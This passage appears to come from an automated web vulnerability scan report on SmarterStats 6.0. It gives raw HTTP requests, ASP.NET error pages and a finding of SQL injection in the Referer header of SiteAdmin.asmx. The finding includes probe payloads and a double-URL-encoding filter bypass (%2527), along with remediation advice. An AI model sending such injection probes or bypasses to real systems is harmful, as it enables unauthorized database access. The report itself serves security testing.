at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSiteStatus HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4''; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19153
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSiteStatus</h2>
<p class="intro">Returns the status for one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSiteStatus' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSiteStatus"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteStatus xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSiteStatus&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteStatusResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteStatusResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteStatusResult&gt;
&lt;/GetSiteStatusResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteStatus xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSiteStatus&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteStatusResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteStatusResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteStatusResult&gt;
&lt;/GetSiteStatusResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSiteStatus?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSiteStatus HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

</span>









</body>
</html>

2.8. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:40 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19931
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
